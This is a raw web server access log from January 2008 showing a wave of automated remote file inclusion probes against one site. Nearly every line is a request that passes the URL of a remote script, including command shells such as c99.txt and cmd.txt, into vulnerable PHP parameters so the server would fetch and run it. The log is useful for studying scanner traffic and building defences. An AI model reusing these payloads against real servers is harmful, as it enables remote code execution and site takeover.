64.13.250.115 - - [30/Jan/2008:10:25:33 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:25:37 -0800] "GET /logs/access_071212.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.3.86.86 - - [30/Jan/2008:10:25:47 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [30/Jan/2008:10:25:49 -0800] "GET /logs/access_071230.log/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [30/Jan/2008:10:25:49 -0800] "GET /home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [30/Jan/2008:10:25:49 -0800] "GET /logs/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.145.104 - - [30/Jan/2008:10:25:50 -0800] "GET /logs/access_071230.log/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [30/Jan/2008:10:25:50 -0800] "GET /home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [30/Jan/2008:10:25:50 -0800] "GET /logs/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.51.108.62 - - [30/Jan/2008:10:26:30 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [30/Jan/2008:10:26:30 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [30/Jan/2008:10:26:31 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [30/Jan/2008:10:26:55 -0800] "GET /logs/access_071231.log/akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:27:24 -0800] "GET /logs/access_071116.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:10:27:40 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.126.175.146 - - [30/Jan/2008:10:27:53 -0800] "GET /logs/access_071230.log/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.126.175.146 - - [30/Jan/2008:10:27:54 -0800] "GET /home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.126.175.146 - - [30/Jan/2008:10:27:54 -0800] "GET /logs/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:27:55 -0800] "GET /logs/access_071218.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.204.17.137 - - [30/Jan/2008:10:27:58 -0800] "GET /logs/access_071230.log/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.204.17.137 - - [30/Jan/2008:10:27:59 -0800] "GET /home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.204.17.137 - - [30/Jan/2008:10:27:59 -0800] "GET /logs/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.139.98 - - [30/Jan/2008:10:28:10 -0800] "GET /logs/access.log/index.php?basepath=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [30/Jan/2008:10:28:10 -0800] "GET /index.php?basepath=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [30/Jan/2008:10:28:10 -0800] "GET /logs/index.php?basepath=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.171.173 - - [30/Jan/2008:10:28:28 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.173 - - [30/Jan/2008:10:28:29 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.171.173 - - [30/Jan/2008:10:28:29 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.245.48.163 - - [30/Jan/2008:10:28:30 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.245.48.163 - - [30/Jan/2008:10:28:30 -0800] "GET //Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
134.245.48.163 - - [30/Jan/2008:10:28:31 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.157.58 - - [30/Jan/2008:10:28:33 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.157.58 - - [30/Jan/2008:10:28:34 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.157.58 - - [30/Jan/2008:10:28:34 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.157.122.154 - - [30/Jan/2008:10:28:37 -0800] "GET /logs/access_071230.log/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [30/Jan/2008:10:28:38 -0800] "GET /home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.58.105.162 - - [30/Jan/2008:10:28:49 -0800] "GET /logs/access_071230.log/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.58.105.162 - - [30/Jan/2008:10:28:49 -0800] "GET /home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.58.105.162 - - [30/Jan/2008:10:28:50 -0800] "GET /logs/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:28:57 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:28:57 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:28:57 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.174.136 - - [30/Jan/2008:10:29:08 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.174.136 - - [30/Jan/2008:10:29:08 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.174.136 - - [30/Jan/2008:10:29:08 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:29:18 -0800] "GET /logs/access_071231.log/akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.204.79 - - [30/Jan/2008:10:29:24 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.79 - - [30/Jan/2008:10:29:24 -0800] "GET //Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.204.79 - - [30/Jan/2008:10:29:24 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.55.174.136 - - [30/Jan/2008:10:29:31 -0800] "GET /logs/access_071231.log/akocomments.php?mosConfig_absolute_path=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
116.193.163.10 - - [30/Jan/2008:10:30:29 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://real-spam.com/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:10:31:55 -0800] "GET /logs/access_071230.log/squirrelcart/cart_content.php?cart_isp_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:10:31:56 -0800] "GET /logs/squirrelcart/cart_content.php?cart_isp_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.0.141.110 - - [30/Jan/2008:10:32:05 -0800] "GET /logs/access_071230.log/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [30/Jan/2008:10:32:05 -0800] "GET /home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [30/Jan/2008:10:32:06 -0800] "GET /logs/home.php?pag=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
216.139.219.235 - - [30/Jan/2008:10:32:22 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.219.235 - - [30/Jan/2008:10:32:23 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.219.235 - - [30/Jan/2008:10:32:23 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.77.89 - - [30/Jan/2008:10:32:27 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.77.89 - - [30/Jan/2008:10:32:27 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.77.89 - - [30/Jan/2008:10:32:27 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.11.50.84 - - [30/Jan/2008:10:32:31 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.50.84 - - [30/Jan/2008:10:32:32 -0800] "GET //Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.50.84 - - [30/Jan/2008:10:32:32 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.194.71 - - [30/Jan/2008:10:32:51 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.194.71 - - [30/Jan/2008:10:32:51 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.194.71 - - [30/Jan/2008:10:32:51 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.224.77 - - [30/Jan/2008:10:33:22 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.77 - - [30/Jan/2008:10:33:22 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.77 - - [30/Jan/2008:10:33:23 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.146.66 - - [30/Jan/2008:10:33:23 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.146.66 - - [30/Jan/2008:10:33:23 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.239.146.66 - - [30/Jan/2008:10:33:24 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [30/Jan/2008:10:33:27 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [30/Jan/2008:10:33:28 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [30/Jan/2008:10:33:28 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.24.226 - - [30/Jan/2008:10:34:01 -0800] "GET /logs/access_071202.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.iseeproject.org/cms/administrator/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.250.53 - - [30/Jan/2008:10:34:10 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.250.53 - - [30/Jan/2008:10:34:15 -0800] "GET //skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.250.53 - - [30/Jan/2008:10:34:20 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:10:34:33 -0800] "GET /logs/access_071229.log/index2.php?x=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:10:34:34 -0800] "GET /logs/index2.php?x=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.201.199.146 - - [30/Jan/2008:10:34:50 -0800] "GET /logs//login.php?dir=http://www.ccdsm.net/id? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
61.201.199.146 - - [30/Jan/2008:10:34:50 -0800] "GET //login.php?dir=http://www.ccdsm.net/id? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.106.177.9 - - [30/Jan/2008:10:34:55 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.177.9 - - [30/Jan/2008:10:34:55 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.177.9 - - [30/Jan/2008:10:34:56 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.209.168 - - [30/Jan/2008:10:35:21 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.209.168 - - [30/Jan/2008:10:35:22 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.38.62.39 - - [30/Jan/2008:10:35:22 -0800] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.38.62.39 - - [30/Jan/2008:10:35:22 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
91.142.209.168 - - [30/Jan/2008:10:35:22 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.33.2.131 - - [30/Jan/2008:10:35:39 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [30/Jan/2008:10:35:44 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.237 - - [30/Jan/2008:10:35:45 -0800] "GET /tmp/mailError.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.249.117.99 - - [30/Jan/2008:10:35:50 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.117.99 - - [30/Jan/2008:10:35:51 -0800] "GET //Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.117.99 - - [30/Jan/2008:10:35:51 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.90.168.130 - - [30/Jan/2008:10:36:24 -0800] "GET /logs/access_071220.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.90.168.130 - - [30/Jan/2008:10:36:25 -0800] "GET /logs/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 32398 "-" "libwww-perl/5.808" "www.dmulk.com"
194.90.168.130 - - [30/Jan/2008:10:36:26 -0800] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.29.114 - - [30/Jan/2008:10:36:34 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [30/Jan/2008:10:36:34 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.29.114 - - [30/Jan/2008:10:36:34 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [30/Jan/2008:10:36:48 -0800] "GET /logs/access_080101.log/config.php?path_to_root=http://www.moskaworned.xpg.com.br/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.183.154 - - [30/Jan/2008:10:37:00 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.183.154 - - [30/Jan/2008:10:37:00 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.183.154 - - [30/Jan/2008:10:37:01 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.250.53 - - [30/Jan/2008:10:38:29 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:10:38:43 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:10:38:43 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:10:38:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.151.161 - - [30/Jan/2008:10:39:27 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [30/Jan/2008:10:39:32 -0800] "GET //skin/zero_vote/error.php?dir=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [30/Jan/2008:10:39:38 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.47 - - [30/Jan/2008:10:40:06 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.lchs83.org/images/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.47 - - [30/Jan/2008:10:40:07 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.lchs83.org/images/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.47 - - [30/Jan/2008:10:40:07 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.lchs83.org/images/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.47 - - [30/Jan/2008:10:40:19 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.lchs83.org/images/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.47 - - [30/Jan/2008:10:40:20 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.lchs83.org/images/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.120.47 - - [30/Jan/2008:10:40:20 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.lchs83.org/images/d.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.59.134.223 - - [30/Jan/2008:10:41:27 -0800] "GET /include/inc_ext/spaw/dialogs/colorpick.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [30/Jan/2008:10:41:36 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.205.213.57 - - [30/Jan/2008:10:41:44 -0800] "GET /logs/access_071219.log//Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.205.213.57 - - [30/Jan/2008:10:41:44 -0800] "GET //Neos_Chronos/header.php?base_folder=http://r3technologies.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
